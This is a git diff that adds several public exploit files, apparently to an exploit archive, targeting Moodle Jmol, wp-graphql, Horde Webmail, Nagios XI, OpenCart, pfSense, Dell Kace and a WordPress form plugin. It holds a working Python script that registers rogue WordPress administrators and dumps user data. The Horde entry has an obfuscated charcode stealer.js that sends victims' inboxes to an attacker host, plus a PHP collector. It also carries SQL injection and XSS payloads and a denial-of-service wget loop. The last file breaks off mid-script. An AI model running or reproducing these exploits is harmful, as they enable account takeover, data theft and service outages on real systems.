+* Partial fix: https://sourceforge.net/p/jsmol/code/1004/
+
+This issue is tracked at the following URLs:
+https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities
+https://tracker.moodle.org/browse/CONTRIB-7516
+
+CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
+
+== Proof of Concept ==
+
+1. Directory traversal
+http://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
+2. Reflected cross-site scripting
+http://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html
+http://<moodle>/filter/jmol/iframe.php?_USE=%22};alert(%27XSS%27);//
+3. Malware distribution
+http://<moodle>/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&encoding=base64&data=UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA%3D%3D&filename=empty.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/46886.py b/exploits/php/webapps/46886.py
new file mode 100755
index 000000000..7cc66825d
--- /dev/null
+++ b/exploits/php/webapps/46886.py
@@ -0,0 +1,183 @@
+#!/usr/bin/env python
+#
+# Author: Simone Quatrini of Pen Test Partners
+# CVEs: 2019-9879, 2019-9880, 2019-9881
+# Tested on Wordpress 5.1.1 and wp-graphql 0.2.3
+# https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
+
+import argparse
+import requests
+import base64
+import json
+import sys
+
+parser = argparse.ArgumentParser(description="wp-graphql <= 0.2.3 multi-exploit")
+
+parser.add_argument('--url', action='store', dest='url', required=True, help="wp-graphql endpoint. e.g.: http://localhost/wordpress/graphql")
+
+parser.add_argument('--post-comment', nargs=3, action='store', metavar=('postid','userid','commenttext'), dest='comment', required=False, help="Post comment impersonating a specific user. e.g.: --post-comment 2 1 Test")
+
+parser.add_argument('--register-admin', nargs=3, action='store', metavar=('email','password','username'), dest='register', required=False, help="Register a new admin user. e.g.: --register-admin test@example.com MySecretP@ssword hax0r")
+
+parser.add_argument('--verbose', '-v', action='store_true', required=False, help="Shows the full response")
+
+args = parser.parse_args()
+
+
+def show_plugins(url, headers, verbose):
+	payload = {"query":"{plugins{edges{node{name,description,version}}}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'node' in response.text:
+		print "[+] Installed plugins:"
+		parsed = json.loads(response.text)
+		for i in parsed['data']['plugins']['edges']:
+		    print i['node']['name']+" "+i['node']['version']
+	else:
+		print "\n[-] Error code fetching plugins: ", response.status_code
+	
+	if verbose:
+		print(response.text)
+
+def show_themes(url, headers, verbose):
+	payload = {"query":"{themes{edges{node{name,description,version}}}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'node' in response.text:
+		print "\n[+] Installed themes:"
+		parsed = json.loads(response.text)
+		for i in parsed['data']['themes']['edges']:
+		    print i['node']['name']+" "+str(i['node']['version'])
+	else:
+		print "\n[-] Error code fetching themes: ", response.status_code
+	
+	if verbose:
+		print(response.text)
+
+def show_medias(url, headers, verbose):
+	payload = {"query":"{mediaItems{edges{node{id,mediaDetails{file,sizes{file,height,mimeType,name,sourceUrl,width}},uri}}}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'node' in response.text:
+		print "\n[+] Media items:"
+		parsed = json.loads(response.text)
+		for i in parsed['data']['mediaItems']['edges']:
+		    print "/wp-content/uploads/"+i['node']['mediaDetails']['file']
+	else:
+		print "\n[-] Error code fetching media items: ", response.status_code
+	
+	if verbose:
+		print(response.text)
+
+def show_users(url, headers, verbose):
+	payload = {"query":"{users{edges{node{firstName,lastName,nickname,roles,email,userId,username}}}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'node' in response.text:
+		print "\n[+] User list:"
+		parsed = json.loads(response.text)
+		for i in parsed['data']['users']['edges']:
+		    print "ID: "+str(i['node']['userId'])+" - Username: "+i['node']['username']+" - Email: "+i['node']['email']+" - Role: "+i['node']['roles'][0]
+	else:
+		print "\n[-] Error code fetching user list: ", response.status_code
+	
+	if verbose:
+		print(response.text)
+
+def show_comments(url, headers, verbose):
+	payload = {"query":"{comments(where:{includeUnapproved:[]}){edges{node{id,commentId,approved,content(format:RAW)}}}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'node' in response.text:
+		print "\n[+] Comments list:"
+		parsed = json.loads(response.text)
+		for i in parsed['data']['comments']['edges']:
+		    print "ID: "+str(i['node']['commentId'])+" - Approved: "+str(i['node']['approved'])+" - Text: "+str(i['node']['content'])
+	else:
+		print "\n[-] Error code fetching comments list: ", response.status_code
+	
+	if verbose:
+		print(response.text)
+
+def show_password_protected(url, headers, verbose):
+	payload = {"query":"{posts(where:{hasPassword:true}){edges{node{title,id,content(format:RAW)}}}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'node' in response.text:
+		print "\n[+] Found the following password protected post(s):"
+		parsed = json.loads(response.text)
+		for i in parsed['data']['posts']['edges']:
+		    print "ID: "+base64.b64decode(str(i['node']['id']))+" - Title: "+str(i['node']['title'])+" - Content: "+str(i['node']['content'])
+	else:
+		print "\n[-] No password protected post found"
+
+	if verbose:
+		print(response.text)
+
+	payload = {"query":"{pages(where:{hasPassword:true}){edges{node{id,link,title,uri,content(format:RAW)}}}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'node' in response.text:
+		print "\n[+] Found the following password protected page(s):"
+		parsed = json.loads(response.text)
+		for i in parsed['data']['pages']['edges']:
+		    print "ID: "+base64.b64decode(str(i['node']['id']))+" - Title: "+str(i['node']['title'])+" - Content: "+str(i['node']['content'])
+	else:
+		print "\n[-] No password protected page found"
+
+	if verbose:
+		print(response.text)
+
+
+def post_comment(url, headers, postID, userID, comment, verbose):
+	payload = {"query":"mutation{createComment(input:{postId:"+postID+",userId:"+userID+",content:\""+comment+"\",clientMutationId:\"UWHATM8\",}){clientMutationId}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'UWHATM8' in response.text:
+		print "[+] Comment posted on article ID "+postID+""
+	else:
+		print "\n[-] Error posting the comment. Check that postID and userID are correct"
+
+	if verbose:
+		print(response.text)
+
+def register_admin(url, headers, email, password, username, verbose):
+	payload = {"query":"mutation{registerUser(input:{clientMutationId:\"UWHATM8\",email:\""+email+"\",password:\""+password+"\",username:\""+username+"\",roles:[\"administrator\"]}){clientMutationId}}"}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200 and 'UWHATM8' in response.text:
+		print "[+] New admin created. Login with "+username+":"+password
+	else:
+		print "\n[-] Registrations are closed, can't proceed."
+
+	if verbose:
+		print(response.text)
+
+def check_endpoint(url, headers):
+	payload = {'':''}
+	response = requests.post(url, data=json.dumps(payload), headers=headers)
+	if response.status_code == 200:
+		print "[+] Endpoint is reachable\n"
+	else:
+		print "\n[-] Endpoint response code: ", response.status_code
+		sys.exit()
+		
+
+
+url = args.url
+headers = {'Content-type': 'application/json', 'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
+verbose = args.verbose
+
+
+# Only in case '--post-comment' is passed
+if args.comment:
+	postID, userID, comment = args.comment
+	check_endpoint(url, headers)
+	post_comment(url, headers, postID, userID, comment, verbose)
+	sys.exit()
+
+# Only in case '--register-admin' is passed
+if args.register:
+	email, password, username = args.register
+	check_endpoint(url, headers)
+	register_admin(url, headers, email, password, username, verbose)
+	sys.exit()
+
+# Default actions if only '--url' is passed
+show_plugins(url, headers, verbose)
+show_themes(url, headers, verbose)
+show_medias(url, headers, verbose)
+show_users(url, headers, verbose)
+show_comments(url, headers, verbose)
+show_password_protected(url, headers, verbose)
\ No newline at end of file
diff --git a/exploits/php/webapps/46903.txt b/exploits/php/webapps/46903.txt
new file mode 100644
index 000000000..6668274bb
--- /dev/null
+++ b/exploits/php/webapps/46903.txt
@@ -0,0 +1,70 @@
+# Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
+# Date: 17.05.2019
+# Author: InfinitumIT
+# Vendor Homepage: https://www.horde.org/
+# Version: Up to v5.2.22.
+# CVE: CVE-2019-12094 & CVE-2019-12095
+# info@infinitumit.com.tr && numan.ozdemir@infinitumit.com.tr
+# PoC: https://numanozdemir.com/respdisc/horde/horde.mp4
+# Materials: https://numanozdemir.com/respdisc/horde/materials.zip
+
+# Description:
+# Attacker can combine "CSRF vulnerability in Trean Bookmarks (defaultly installed on Horde Groupware)" and
+# "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" vulnerabilities to steal victim's emails.
+
+# Also:
+# Attacker can use 3 different reflected XSS vulnerability to exploit Remote Command Execution, SQL Injection and Code Execution.
+# To steal e-mails, attacker will send an e-mail to victim and victim will click the attacker's website.
+# So, victim's inbox will be dumped in attacker's FTP.
+# All of them vulnerabillities are valid for all Horde Webmail versions.
+
+# Attacker will exploit the CSRF and XSS with: index.html
+# Attacker will steal and post the emails with: stealer.js
+# Attacker will save the emails with: stealer.php
+
+# index.html Codes:
+<script>
+var url = "http://webmail.victimserver.com/trean/";
+var params =  
+'iframe=0&popup=0&newFolder=&actionID=add_bookmark&url=http%3A%2F%2Ftest.com&title=vulnerability&description=vulnerability&treanBookmarkTags=%22%3E%3Cscript%2Fsrc%3D%22http%3A%2F%2Fyourwebsite.com%2Fhorde%2Fstealer.js%22%3E%3C%2Fscript%3E';
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+</script>
+<embed/src="http://webmail.victimserver.com/services/portal/"/height="1"/width="1">
+
+
+# stealer.js Codes:
+eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,116,101,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121))
+// It is charcoded, firstly decode and edit for yourself then encode again. Also dont forget to remove spaces!
+
+
+# stealer.php Codes:
+<?php
+header('Access-Control-Allow-Origin: *');
+header('Access-Control-Allow-Headers: *');
+if($_POST['inbox']){
+$logs = fopen("inbox.txt", "a+");
+$data = $_POST['inbox']."  
+-----------------------------------------------------------------  
+".chr(13).chr(10).chr(13).chr(10);
+fwrite($logs, $data);
+}
+?>
+
+#  
+_____________________________________________________________________________________________________
+
+# Reflected XSS to Remote Command Execution, Remote Code Execution and SQL Injection:
+
+# http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
+# http://webmailvictimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f
+# http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE
+
+# Attacker can execute commands & PHP codes remotely and inject harmful SQL queries.
+# Also, attacker can create users too with those reflected XSS vulnerabilities.
+
+# Stay Secure with InfinitumIT - infinitumit.com.tr
\ No newline at end of file
diff --git a/exploits/php/webapps/46910.txt b/exploits/php/webapps/46910.txt
new file mode 100644
index 000000000..beb66c24b
--- /dev/null
+++ b/exploits/php/webapps/46910.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Nagiosxi username sql injection
+# Date: 22/05/2019
+# Exploit Author: JameelNabbo
+# Website: jameelnabbo.com
+# Vendor Homepage: https://www.nagios.com
+# Software Link: https://www.nagios.com/products/nagios-xi/
+# Version: xi-5.6.1
+# Tested on: MacOSX
+#CVE: CVE-2019-12279
+
+POC:
+
+POST /nagiosxi/login.php?forgotpass HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://example.com/nagiosxi/login.php?forgotpass
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 129
+Connection: close
+Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6
+Upgrade-Insecure-Requests: 1
+
+page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION}
\ No newline at end of file
diff --git a/exploits/php/webapps/46921.sh b/exploits/php/webapps/46921.sh
new file mode 100755
index 000000000..52e857e39
--- /dev/null
+++ b/exploits/php/webapps/46921.sh
@@ -0,0 +1,58 @@
+#!/bin/bash
+#
+#  Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
+#
+#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
+#
+#  PoC exploit, just for test...
+#  Tested on store with added more than 1000 products
+#  Usage: ./cartkiller.sh store_url threads sleep
+#  Example: ./cartkiller.sh https://store_name 50 5
+#
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+
+echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
+echo
+echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
+echo
+echo "PoC exploit, just for test..."
+echo "Tested on store with added more than 1000 products"
+
+if [ -z "$3" ]; then
+echo Usage: "$0" store_url threads sleep
+echo Example: "$0" https://store_name 50 5
+exit 4
+fi
+ 
+url="$1"
+threads="$2"
+sleep="$3"
+while :
+do
+        for ((i=1;i<=$2;i++)); 
+        do 	
+	    wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
+        done
+#
+# Sleep between loops..
+#      
+sleep $sleep
+done
\ No newline at end of file
diff --git a/exploits/php/webapps/46936.txt b/exploits/php/webapps/46936.txt
new file mode 100644
index 000000000..ff7102a89
--- /dev/null
+++ b/exploits/php/webapps/46936.txt
@@ -0,0 +1,21 @@
+# Exploit Title: pfSense 2.4.4-p3 (ACMEPackage 0.5.7_1) - Stored Cross-Site Scripting 
+# Date: 05.28.2019 
+# Exploit Author: Chi Tran
+# Vendor Homepage: https://www.pfsense.org 
+# Version: 2.4.4-p3/0.5.7_1
+# Software Link: N/A
+# Google Dork: N/A
+# CVE:2019-12347 
+
+################################################################################################################################## 
+Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. 
+In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
+
+The ACME Package for pfSense interfaces with Let’s Encrypt to handle the certificate generation, validation, and  renewal processes. (https://docs.netgate.com/pfsense/en/latest/certificates/acme-package.html)
+################################################################################# 
+
+Proof of Concepts:
+
+1 - Navigate to https://192.168.1.1/acme/acme_accountkeys_edit.php 
+2 - In the "Name" and "Description" field, input payload: "><svg/onload=alert(1)>
+3 - XSS box will then pop-up
\ No newline at end of file
diff --git a/exploits/php/webapps/46956.txt b/exploits/php/webapps/46956.txt
new file mode 100644
index 000000000..8231e1fca
--- /dev/null
+++ b/exploits/php/webapps/46956.txt
@@ -0,0 +1,153 @@
+# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]
+# Date: [12/04/2018]
+# Exploit Author: [SlidingWindow],  Twitter: @kapil_khot
+# Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]
+# Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]
+# Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]
+# CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]
+#CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]
+#Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update
+
+
+==================
+#Product:-
+==================
+Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. It also provides software for security, application virtualization, and systems management products.
+
+==================
+#Vulnerability:-
+==================
+The Dell Kace K1000 Appliance (Now, Quest Kace K1000) suffers from several vulnerabilities such as Multiple Blind SQL Injection, Stored Cross-Site-Scripting, and mis-configured CORS.
+
+========================
+#Vulnerability Details:-
+========================
+
+=====================================================================================================================================================
+1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)
+=====================================================================================================================================================
+
+The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with ‘User Console Only’ rights. Also, the user input supplied to 'selvalue' parameter is not sanitized that leads to a Blind SQL Injection vulnerability.
+
+#Proof-Of-Concept:
+------------------
+1. Send following request to the target:
+
+GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1
+Host: 192.168.247.100
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1
+Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc
+Connection: close
+
+2. Make a note of Content-Length in the response body.
+
+3. Send following request:
+
+http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
+
+4. Response to above request shows that an error occurred and we are being redirected to /common/error.php
+
+5. Final payload to check if we get the original response back:
+
+http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
+
+6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
+
+
+
+=========================================================================================================================================================
+2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)
+=========================================================================================================================================================
+
+The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', that can be accessed by a user with ‘Read Only Administrator’ rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability.
+An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database.
+
+#Proof-Of-Concept:
+------------------
+1. Send following request to the target:
+
+GET /adminui/oval_detail.php?ID=6200 HTTP/1.1
+Host: 192.168.247.100
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.247.100/adminui/oval_list.php
+Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+2. Response to above request shows some content with the content length of 32109 bytes:
+
+3. It shows information about OVAL-ID#24253:
+
+4. Now send following payload that tests this ID parameter for a true condition:
+
+	http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432
+
+5. Response to above request again shows information about the same OVAL-ID#24252:
+
+6. Now, use following payload to test this ID parameter for a false condition:
+	
+	http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444
+
+7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID:
+
+8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
+
+=========================================================================================================================================================
+3. Stored Cross Site Scripting (XSS) Vulnerability (CVE-2018-5405)
+=========================================================================================================================================================
+
+The Dell Kace K1000 fails to sanitize user input when creating a ticket. A least privileged user with ‘User Console Only’ rights could exploit this vulnerability to inject arbitrary JavaScript while creating tickets that would be executed when administrators or any other user view these tickets.
+An authenticated least privileged user with ‘User Console Only’ rights to inject arbitrary JavaScript code on the tickets page. This script executes every time a user visits this page. This allows a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks.
+
+#Proof-Of-Concept:
+------------------
+1. Log into the Dell Kace K1000 web interface as a least privileged user.
+2. Navigate to Service Desk-->Tickets and create a new ticket.
+3. Inject following payload in the Summary section:
+	
+	Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!--
+
+4. Save the ticket.
+5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up.
+6. Any user, including administrator visiting this ticket page would execute the injected script.
+
+
+=========================================================================================================================================================
+4. Misconfigured CORS Vulnerability (CVE-2018-5406)
+=========================================================================================================================================================
+
+The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack.
+
+An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings.
+
+
+#Proof-Of-Concept:
+------------------
+1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine. 
+2. Log into the web interface of the appliance as admin.
+3. Open a new tab in the same browser and access the HTML page from #1
+4. Save the ticket.
+5. Submit the request (This can be modified to submit the request automatically).
+6. Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine
+7. Check the admin console to see if user Hacker has been added:
+
+===================================
+#Vulnerability Disclosure Timeline:
+===================================
+
+04/2018: Submitted report to CERT-US.
+04/2018: CERT-US reported the issue to vendor.
+05/2018: Awaiting vendor response.
+10/2018: Vendor asked to test the patch as they have fixed these issues already.
+10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version.
+01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch.
+05/2019: Vendor published an advisory.
+06/2019: CERT-US published a Vulnerability Note, VU#877837.
\ No newline at end of file
diff --git a/exploits/php/webapps/46958.txt b/exploits/php/webapps/46958.txt
new file mode 100644
index 000000000..e0db85a22
--- /dev/null
+++ b/exploits/php/webapps/46958.txt
@@ -0,0 +1,59 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
+# Date: 22-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://10web.io/plugins/
+# Software Link: https://wordpress.org/plugins/form-maker/
+# Version: 1.13.3
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2019-10866
+
+import requests
+import time
+
+url_vuln = 'http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc='
+session = requests.Session()
